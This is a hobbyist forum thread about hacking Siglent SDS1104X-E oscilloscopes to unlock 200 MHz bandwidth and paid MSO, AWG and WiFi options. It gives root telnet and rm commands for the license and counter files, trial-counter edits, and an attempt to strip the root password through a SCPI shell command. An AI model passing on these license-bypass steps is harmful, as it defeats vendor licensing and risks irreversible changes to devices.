Author Topic: Siglent SDS1104X-E Hack to 200Mhz, and full options ?  (Read 66418 times)

Offline S.Garrix

  • Newbie
  • Posts: 2
Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« on: July 11, 2018, 03:29:13 pm »
I have two Siglent 1104x-e in my lab, and noticed the thread: https://www.eevblog.com/forum/testgear/siglent-sds1204x-e-released-for-domestic-markets-in-china/825/
and in Reply #785 @ian.ameline “upgraded” the SDS1104X-E to 200Mhz, Rf loop confirmed.
Thanks to Ian and rfloop, I patched the OS update so that the root password is known, and had one of my SDS1104X-E upgraded to 200Mhz:
1. Patch the OS update, set password.
2. Connect SDS1104X-E by telnet.
3. Input command "mount -o remount,rw,sync /usr/bin/siglent/firmdata0".
4. Input command "rm /usr/bin/siglent/firmdata0/bandwidth.txt".
5. Restart the scope.

!!Update for commands
In the exact same way I also got MSO, AWG, WIFI full options.
Step 4, command "rm /usr/bin/siglent/firmdata0/options_mso_times.txt"
"rm /usr/bin/siglent/usr/usr/options_mso_times.txt"
"rm /usr/bin/siglent/firmdata0/options_awg_times.txt"
"rm /usr/bin/siglent/usr/usr/options_awg_times.txt"
"rm /usr/bin/siglent/firmdata0/options_wifi_times.txt"
"rm /usr/bin/siglent/usr/usr/options_wifi_times.txt"

Not sure if Siglent will close the door or not
« Last Edit: July 18, 2018, 07:01:10 am by S.Garrix »
 
The following users thanked this post: TheNewLab, ian.ameline, Coldblackice

Offline innkeeper

  • Supporter
  • ****
  • Posts: 616
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #1 on: July 11, 2018, 04:47:02 pm »
Unless someone sees fault with this, I'd use an mv (move) command to move it to a new name or place instead of rm (remove), in case you ever needed to put it back.



Hobbyist and a retired engineer and possibly a test equipment addict, though, searching for the equipment to test for that.
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #2 on: July 11, 2018, 05:51:27 pm »
Yes, definitely do not remove the files - suppose Siglent requires them to be present for an OS or firmware upgrade at some future time?  You'd have to restore them from your backup (you did make a backup, right?).   :D
 

Offline tubularnut

  • Regular Contributor
  • *
  • Posts: 140
  • Country: gb
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #3 on: July 11, 2018, 06:12:26 pm »
The files only contain the text "30" , if you still have the 30 remaining times.

However, it didn't work for me, either by renaming the files (mv) or deleting them.

As a note there are also 3 copies in the folder "/usr/bin/siglent/usr/usr" which get recreated if you rename or delete them.
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #4 on: July 11, 2018, 06:30:30 pm »
Those files don't even exist on my scope in the firmdata0 directory...  and I can confirm that renaming the files in /usr/bin/siglent/usr/usr doesn't work.
 

Offline BillB

  • Supporter
  • ****
  • Posts: 612
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #5 on: July 11, 2018, 10:50:45 pm »
Those files don't even exist on my scope in the firmdata0 directory...  and I can confirm that renaming the files in /usr/bin/siglent/usr/usr doesn't work.

Hmmm...

Code:
/usr/bin/siglent/firmdata0 # ls -l
total 140
-rw-r--r--    1 root     root           241 Jan  1 00:33 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Aug 21  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:15 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:00 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
---sr----x    1 root     root            20 Jan  1 00:23 options_awg_cfg.bin
---sr----x    1 root     root            20 Jan  1 00:23 options_awg_license.txt
-------r-x    1 root     root            10 Jan  1 00:00 options_awg_times.txt
-rwx--sr-T    1 root     root            20 Jan  1 00:21 options_mso_cfg.bin
-rwx--sr-T    1 root     root            20 Jan  1 00:21 options_mso_license.txt
------x---    1 root     root            10 Jan  1 00:00 options_mso_times.txt
--ws--x---    1 root     root            20 Jan  1 00:25 options_wifi_cfg.bin
--ws--x--x    1 root     root            20 Jan  1 00:25 options_wifi_license.txt
-------r-x    1 root     root            10 Jan  1 00:00 options_wifi_times.txt
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:00 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Aug 21  2017 version.txt
-rw-r--r--    1 root     root             5 Jan  1 00:00 whoami.txt
/usr/bin/siglent/firmdata0 #

This is with both the latest firmware and OS updates: 7.1.6.1.25R2
 
« Last Edit: July 11, 2018, 11:17:43 pm by BillB »
 
The following users thanked this post: tautech

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #6 on: July 12, 2018, 12:38:57 am »
Code:
/usr/bin/siglent/firmdata0 # ls -l
total 100
-rw-r--r--    1 root     root           241 Jan  1 00:02 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Sep 18  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:05 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Sep 18  2017 version.txt

Very interesting...  7.1.6.1.25 R2 here too.
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #7 on: July 12, 2018, 02:14:10 am »
Code:
/usr/bin/siglent/firmdata0 # ls -l
total 100
-rw-r--r--    1 root     root           241 Jan  1 00:02 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Sep 18  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:05 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Sep 18  2017 version.txt

Very interesting...  7.1.6.1.25 R2 here too.

Have you also installed the latest software update?

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #8 on: July 12, 2018, 02:47:05 am »
I installed the latest versions from Siglent's website as soon as I verified the scope was running properly:

SDS1004X-E Firmware (4-Channel Model) - 6.1.25R2 (Release Date 06.05.18 )
SDS1004X-E Operating System -V1 (Only For 4-Channel ) (Release Date 06.26.18 )

That's 7.1 (OS).6.1.25R2 (firmware), as I indicated, right?
 

Offline innkeeper

  • Supporter
  • ****
  • Posts: 616
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #9 on: July 12, 2018, 03:21:35 am »
7.1.6.1.25 R2 here too - similar - no mso, wifi, awg configs,
and I did install and run the latest software - EasyScopeX – 100R001B02D01P20 (Release Date 06.07.18 ) (if that's what you're referring to).
Is there a newer OS image we should be using?

Code:
/usr/bin/siglent/firmdata0 # ls -l
total 112
-rw-r--r--    1 root     root           241 Jan  1 00:00 NSP_system_info.xml
-rw-r--r--    1 root     root            63 Jan  1 00:00 NSP_trends_config_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:32 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000          7688 Sep 18  2017 acq_self_cal_user.bin
-rwxrwxrwx    1 1000     1000          7448 Jan  1 00:12 acq_self_factory_cal.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rwxrwxrwx    1 root     root         52916 Jan  1 00:00 factory_setting.xml
-------r-x    1 root     root            10 Jan  1 00:00 options_awg_times.txt
------x---    1 root     root            10 Jan  1 00:00 options_mso_times.txt
------x---    1 root     root            10 Jan  1 00:00 options_wifi_times.txt
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 pro_filter_cfg.bin
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
-rwxrwxrwx    1 1000     1000            67 Sep 18  2017 version.txt
/usr/bin/siglent/firmdata0 #
« Last Edit: July 12, 2018, 03:35:19 am by innkeeper »
Hobbyist and a retired engineer and possibly a test equipment addict, though, searching for the equipment to test for that.
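
The firmdata0 listings posted in Replies #5, #6 and #9 can be compared mechanically instead of by eye. The following is an added example, not code from any poster in this thread: it parses `ls -l` lines, converts each mode string to its numeric mode (including the s/S and t/T letters), and reports which files exist on one unit but not the other and which carry special or permissive bits. The sample lines are a subset copied from the listings above; all function names are illustrative.

```python
"""Compare `ls -l` listings from two units and flag unusual file modes."""
import re
import stat

# Subset of the firmdata0 listings posted in Reply #5 (A) and Reply #6 (B).
LISTING_A = """\
total 140
-rw-r--r--    1 root     root           241 Jan  1 00:33 NSP_system_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:00 bandwidth.bak
---sr----x    1 root     root            20 Jan  1 00:23 options_awg_license.txt
-------r-x    1 root     root            10 Jan  1 00:00 options_awg_times.txt
-rwx--sr-T    1 root     root            20 Jan  1 00:21 options_mso_license.txt
------x---    1 root     root            10 Jan  1 00:00 options_mso_times.txt
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
"""
LISTING_B = """\
total 100
-rw-r--r--    1 root     root           241 Jan  1 00:02 NSP_system_info.xml
--wxr-Sr--    1 root     root          7012 Jan  1 00:31 acq_quick_cal_factory.bin
-rwxrwxrwx    1 1000     1000            16 Jan  1 00:01 bandwidth.bak
-rw-r--r--    1 root     root          3320 Jan  1 00:00 sys_cfg.cfg
"""

# Fields: mode, link count, owner, group, size, date (3 tokens), name.
LINE_RE = re.compile(
    r"^([-dlbcps][-rwxsStT]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+"
    r"\w{3}\s+\d+\s+[\d:]+\s+(.+)$"
)
SPECIAL = (stat.S_ISUID, stat.S_ISGID, stat.S_ISVTX)  # user, group, other triplet
FLAG_BITS = (
    ("setuid", stat.S_ISUID),
    ("setgid", stat.S_ISGID),
    ("sticky", stat.S_ISVTX),
    ("world-writable", stat.S_IWOTH),
)

def mode_to_octal(mode_str):
    """Convert an `ls -l` mode string such as '-rwx--sr-T' to its numeric mode."""
    perms = mode_str[1:]
    if len(perms) != 9:
        raise ValueError(f"bad mode string: {mode_str!r}")
    bits = 0
    for i, ch in enumerate(perms):
        triplet, pos = divmod(i, 3)
        bit = 1 << (8 - i)
        if pos < 2:  # read / write columns
            if ch == "rw"[pos]:
                bits |= bit
            elif ch != "-":
                raise ValueError(f"bad mode string: {mode_str!r}")
        else:  # execute column, which also carries s/S and t/T
            letter = "sst"[triplet]
            if ch in ("x", letter):  # lowercase s/t: execute is set as well
                bits |= bit
            if ch.lower() == letter:
                bits |= SPECIAL[triplet]
            elif ch not in ("x", "-"):
                raise ValueError(f"bad mode string: {mode_str!r}")
    return bits

def parse_listing(text):
    """Return {filename: numeric mode}; prompt and 'total N' lines are skipped."""
    modes = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            modes[m.group(2)] = mode_to_octal(m.group(1))
    return modes

def unusual_flags(mode):
    """Name the special or permissive bits a reviewer would want to look at."""
    flags = [name for name, bit in FLAG_BITS if mode & bit]
    if not mode & stat.S_IRUSR:
        flags.append("no-owner-read")
    return flags

def compare_listings(a_text, b_text):
    """Diff two listings by file name and mode, and flag unusual modes."""
    a, b = parse_listing(a_text), parse_listing(b_text)
    merged = {**b, **a}
    return {
        "only_in_a": sorted(a.keys() - b.keys()),
        "only_in_b": sorted(b.keys() - a.keys()),
        "mode_differs": sorted(n for n in a.keys() & b.keys() if a[n] != b[n]),
        "flagged": {n: unusual_flags(m) for n, m in sorted(merged.items())
                    if unusual_flags(m)},
    }

if __name__ == "__main__":
    report = compare_listings(LISTING_A, LISTING_B)
    for key in ("only_in_a", "only_in_b", "mode_differs"):
        print(f"{key}: {report[key]}")
    for name, flags in report["flagged"].items():
        print(f"{name}: {', '.join(flags)}")
```
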
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #10 on: July 12, 2018, 05:11:48 pm »
Are you suggesting that (for example) he has a wifi adapter plugged in, and set it up in the options?  Mine won't let me configure any of those options because the hardware is not attached; nonetheless, the temp licenses still show up on it:
 

Offline GregDunn

  • Frequent Contributor
  • **
  • Posts: 731
  • Country: us
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #11 on: July 12, 2018, 06:16:01 pm »
Agreed.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #12 on: July 12, 2018, 07:59:28 pm »
Are you suggesting that (for example) he has a wifi adapter plugged in, and set it up in the options?  Mine won't let me configure any of those options because the hardware is not attached; nonetheless, the temp licenses still show up on it:
Correct.

The option HW modules are at substantial extra cost, so it's debatable that you need MSO and AWG permanent licensing, whereas the WiFi HW is cheap to acquire. Just to do Bode plot, no licensing at all is required.

BTW, see how your ch 3 and 4 0V position indicators are the same but the traces are not......means you need to run the Auto Cal.
Avid Rabid Hobbyist
 

Offline kerouanton

  • Regular Contributor
  • *
  • Posts: 60
  • Country: ch
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #13 on: July 14, 2018, 07:34:15 pm »
The option HW modules are at substantial extra cost, so it's debatable that you need MSO and AWG permanent licensing, whereas the WiFi HW is cheap to acquire. Just to do Bode plot, no licensing at all is required.

Agreed. I don't see the point of having to activate options that require a specific, proprietary hardware. I ordered the SLA1016 and just received the license code to activate the software option. It seems obvious this option is totally useless without the hardware, which embeds a FPGA, buffer memory chips and probably another ARM processor to manage the whole. So the activation should simply be done by plugging the corresponding hardware (which has its own serial number).

Btw, since I managed to telnet into my 1104X-E and make full backups today, before and after activating the MSO option, it may be interesting to have a look at the changes on those backup files.
 

Offline S.Garrix

  • Newbie
  • Posts: 2
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #14 on: July 17, 2018, 09:42:30 am »
what I can see after resetting is all option times back to 30 times
 

Offline ian.ameline

  • Regular Contributor
  • *
  • Posts: 67
  • Country: ca
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #15 on: July 17, 2018, 02:15:29 pm »
You could try putting a larger number than "30" into those files. Try "32767" or "65535" or if you are feeling adventurous, "2147483647"
(2^15-1, 2^16-1 and 2^31-1)

 
 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #16 on: July 26, 2018, 01:44:50 pm »
When I edit the options - it opens in vi as read only. What am I doing wrong?
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #17 on: July 26, 2018, 02:48:43 pm »
You could try putting a larger number than "30" into those files. Try "32767" or "65535" or if you are feeling adventurous, "2147483647"
(2^15-1, 2^16-1 and 2^31-1)

Does anyone know if this worked?

Offline ian.ameline

  • Regular Contributor
  • *
  • Posts: 67
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #18 on: July 26, 2018, 02:52:28 pm »
When I edit the options - it opens in vi as read only. What am I doing wrong?

You need to remount as read/write

(Search the ads forum for "remount" for the form of the command)

 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #19 on: July 26, 2018, 10:12:51 pm »
Thanks, I'll come back to the thread in the morning once I have a second bite of the sav!
 

Offline TheNewLab

  • Frequent Contributor
  • **
  • Posts: 260
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #20 on: July 27, 2018, 06:30:34 am »
I want to do the MSO hack, and attempt to design my own hardware unit. What I have heard is the SLA1016 is nothing to write home about. For $200, my thought is why not make my own hardware unit to experiment/play around with?

Only I noticed above something about a serial number inside the SLA1016 that helps activate the feature on the scope?

What type of programming do I learn to try and encode the FPGA with? And other chips for a DIY SLA1016? Has anyone scanned or reverse engineered the PCB board inside the SLA1016?
Right now, the only difficulty I see in getting parts is the non-standard SBUS connector.

I am having too much fun pushing my first actual legitimate oscilloscope.. :-X ::)
 
The following users thanked this post: Coldblackice

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #21 on: July 27, 2018, 03:47:23 pm »
Hi all,

Any value inserted into the three text files (/usr/bin/siglent/usr/usr/options....) over 30 is shown as 30 in the menu 'Options' on the scope on restart.

What would be interesting is what would happen to the actual value in the text file if I have the MSO or AWG hardware. I assume it would tick from my set value (500 say) to 29 once the HW is plugged in the first time. But perhaps it is only the view function in the code that knows the maximum value for a temporary licence is 30...

Has someone tried the temporary licences and resetting to 30? Perhaps I'll buy the MSO or AWG and find out. The SAG isn't too expensive...


Nice idea to reverse engineer the SLA1016 protocol NewLab.



 

Offline BillB

  • Supporter
  • ****
  • Posts: 612
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #22 on: July 27, 2018, 04:13:39 pm »
...
Only I noticed above something about a serial number inside the SLA1016 that helps activate the feature on the scope?
...

I believe the activation license for the MSO option on the scope is completely independent of the SLA1016.  That is, I do not believe the MSO option is locked to any particular SLA1016.  I've got one SDS1104X-E and one SLA1016, so I can't confirm 100%, but the scope MSO option was activated prior to installing the SLA1016.

« Last Edit: July 27, 2018, 04:31:02 pm by BillB »
 

Offline tmbinc

  • Regular Contributor
  • *
  • Posts: 235
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #23 on: July 27, 2018, 04:19:31 pm »
It would be great if someone could make pictures of the SLA1016. Based on my information (but I could be wrong; I haven't ever seen this device) the SLA1016 is a Zynq-based essentially "stand-alone LA", connected via "SBUS" via relatively-slow (non-realtime; USB even?) communication. Especially the sample memory seems to be on the SLA1016 itself.

Would be great if someone could confirm/refute this.
 

Offline ironcurtain

  • Regular Contributor
  • *
  • Posts: 62
  • Country: es
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #24 on: July 28, 2018, 06:20:16 pm »
Hey, just joined this. My time at the moment for personal reasons is very limited, but I can offer help and advice on reverse engineering firmware and Linux ELF DSOs and executables.

I own a SDS1204X-E though, and I can't or couldn't find the firmware images for my kit. I would like to unlock the WIFI options and others, especially if we can interface it with third-party solutions that are more affordable, or better quality.

I'm somewhat of a novice with EE, but I will trade OS design/reversing knowhow for some mentoring every now and then.

As for the firmware images: I see that they obfuscate them with XOR, correct? And another part is "encrypted" with a modified version of 3DES, presumably with the key known to us (they need to ship it so...). Are there any tools for reassembling images readily available?
 

Offline TheNewLab

  • Frequent Contributor
  • **
  • Posts: 260
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #25 on: August 01, 2018, 06:08:52 am »
S.Garrix has the procedure for hacking the options, there are some questions though. No one has confirmed if it works for their units. It should be the same for all three of the 1000X-E models
 

Offline SaKhan

  • Contributor
  • Posts: 17
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #26 on: September 19, 2018, 04:59:52 pm »
I did the following trying to make the wifi option permanent:

After confirming that the value in /usr/bin/siglent/firmdata0/options_wifi_times.txt gets decremented after each boot, I remounted /usb/bin/siglent read-write and changed /usr/bin/siglent/usr/usr/options_wifi_times.txt with the plugged wifi dongle back to 30. After rebooting, both files had the same value - 30 and any further reboots didn't decrement it anymore. I tried several things afterwards to revert the hack but I couldn't, so if you intend to try it keep that in mind. I hope also that these were the correct steps as I tried that 2 weeks ago. Don't forget also to execute sync and remount read-only afterwards.
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #27 on: September 22, 2018, 05:11:59 am »
Hi, I'm trying to flash the _eevblog OS to gain root access, but when I plug the USB and power on nothing happens. The scope just starts as usual and the known password doesn't work. I've tried formatting and copying the files from Linux and Windows, from two different computers and in two different USB keys, all with the same result. My scope already came with 7.1.6.1.25 R2 software version (FPGA Version 2018-03-06 and HW Version 01-03). Could this be the reason? I tried to update the OS using the official firmware and nothing happened either (probably because it is already running that version). Any hint?
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #28 on: September 22, 2018, 09:19:02 am »
Hi, I'm trying to flash the _eevblog OS to gain root access, but when I plug the USB and power on nothing happens. The scope just starts as usual and the known password doesn't work. I've tried formatting and copying the files from Linux and Windows, from two different computers and in two different USB keys, all with the same result. My scope already came with 7.1.6.1.25 R2 software version (FPGA Version 2018-03-06 and HW Version 01-03). Could this be the reason? I tried to update the OS using the official firmware and nothing happened either (probably because it is already running that version). Any hint?

The equip isn't recognizing the USB. Verify that you can save files to the USB key to check if it's available. You should be able to upgrade indefinitely.
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #29 on: September 22, 2018, 09:39:39 am »
I'm able to capture files with the print button to the usb drive. They appear under \PNG and look ok. I've also tried with a Raspberry Pi (as suggested somewhere else) with the same result. Updating the firmware works without problems (through the menus). The problem is that the scope ignores the update to the OS. When booting it accesses the usb drive (the light lights up 3 times for around 2 seconds each and 1 last time for around 1 second). The files in the root of the USB are:
devicetree.dtb
rootfs.cramfs
sds1004x_e_udiskEnv.txt
uImage

In the pdf it seems that the .txt does not have the extension, but I suppose it is because Windows hides it by default. Anyway I tried without the .txt and it didn't work either. Also in the PDF, the uImage seems to have a space after ("uImage "), but it is probably a mistake; I think it is possible to have a space at the end of a filename in FAT32 but it is not trivial to achieve. Running out of things to try. Right now I'm trying to exploit the fact that the SHELLCMD SCPI command is executed as root to change the password, but it is not that easy, "passwd -d root" seems to do nothing, probably because /etc is mounted as read only. Could anybody with root access execute mount (if possible with a USB inserted) and paste it here?
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #30 on: September 22, 2018, 09:49:11 am »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #31 on: September 22, 2018, 10:05:06 am »
but it is not that easy, "passwd -d root" seems to do nothing, probably because /etc is mounted as read only. Could anybody with root access execute mount (if possible with a USB inserted) and paste it here?

If that was possible, life would be easier for everyone. You can't do that because CRAMFS is RO. That's why the FS needs to be patched beforehand.
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #32 on: September 22, 2018, 02:00:01 pm »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)

One question, and if someone else wonders, do not think anything of it; this is only because I am of a curious and investigative nature.  ;)

The USB drive sizes and speed versions: which ones fail and which one works?
« Last Edit: September 22, 2018, 02:02:02 pm by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 

Offline kahuna0k

  • Regular Contributor
  • *
  • Posts: 68
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #33 on: October 13, 2018, 10:31:39 pm »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)

One question, and if someone other wonder, do not think anything,  this is only because i am curious and investigative nature.  ;)

These USB drive sizes, and speed version, these what fails and this what work.

kingston 16GB USB2 -> fail
samsung 16GB USB3 -> fail
sharkoon accelerate 32GB USB3 -> success
 

Offline tubularnut

  • Regular Contributor
  • *
  • Posts: 140
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #34 on: October 14, 2018, 07:00:58 am »
Kingston DataTraveler G4 32GB usb3 = success
Lexar 8GB usb2 = success
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #35 on: October 14, 2018, 07:38:17 am »
well, after trying with the 3rd USB drive it worked ... Murphy is around me :)

One question, and if someone other wonder, do not think anything,  this is only because i am curious and investigative nature.  ;)

These USB drive sizes, and speed version, these what fails and this what work.

kingston 16GB USB2 -> fail
samsung 16GB USB3 -> fail
sharkoon accelerate 32GB USB3 -> success

Good, it also gives a signal that Siglent's instructions are based on something.

Instructions for OS update tell it clearly:  8G or 32G.
In my logic it does not include 16G at all.
(But still I do not know why 16G is prohibited. I am curious to know why.
But if the manufacturer sets this kind of rule, whether I understand the reason or not, I still follow it.)

If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 
The following users thanked this post: kahuna0k

Offline bugi

  • Frequent Contributor
  • **
  • Posts: 250
  • Country: fi
  • Hobbyist using the ultra slow and unsure method
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #36 on: October 14, 2018, 09:33:49 am »
I guess the instructions should use the word "MUST" instead of "should" in that case. Just to reduce the amount of ? ? ?!?!?%%#***@!! from users.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #37 on: October 14, 2018, 09:46:38 am »
Siglent designers seated at the coffee table: "let's do this work only in 8GB and 32GB sizes!"  :-DD

BTW I suggest that you should all report a few other details of the USB disks (namely the controller):
https://www.eevblog.com/forum/testgear/siglent-sdm3045x-boot-hang/msg1565089/#msg1565089
 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #38 on: October 14, 2018, 12:08:07 pm »
Worked fine when I used a 4Gb USB drive.
 
The following users thanked this post: MadS

Offline Coldblackice

  • Contributor
  • Posts: 15
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #39 on: November 11, 2018, 09:26:36 pm »
Anyone had any further progress (or luck!) on this? I'm considering getting this scope and would love to help out, if it's still thought that achieving this would be feasible.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #40 on: November 11, 2018, 09:34:08 pm »
Anyone had any further progress (or luck!) on this? I'm considering getting this scope and would love to help out, if it's still thought that achieving this would be feasible.
You can find some info here:
https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/
Avid Rabid Hobbyist
 

Offline Coldblackice

  • Contributor
  • Posts: 15
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #41 on: November 20, 2018, 02:48:43 am »
Anyone had any further progress (or luck!) on this? I'm considering getting this scope and would love to help out, if it's still thought that achieving this would be feasible.
You can find some info here:
https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/

Thanks, but was that link meant to point somewhere else? It points to this same thread. I read through the thread + how to do it, but was wondering how this has been faring for those who have tried it:

  • Does it actually work vs. just appearing to support/run at 200mhz?
  • Has anyone noticed any issues?
  • Have firmware updates affected it?
  • etc.
« Last Edit: November 20, 2018, 02:55:56 am by Coldblackice »
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #42 on: November 20, 2018, 02:55:39 am »
Thanks, though was that link meant to point to somewhere else? It points to this same thread. Unless I'm misunderstanding the current status of this: my understanding is that the hack wasn't fully working/fleshed out (based on the followup discussion in the thread). If not,
Sorry.

Read here too:
https://www.eevblog.com/forum/testgear/siglent-ads-firmware-file-format/
Avid Rabid Hobbyist
 
The following users thanked this post: Coldblackice

Offline ripnoel

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
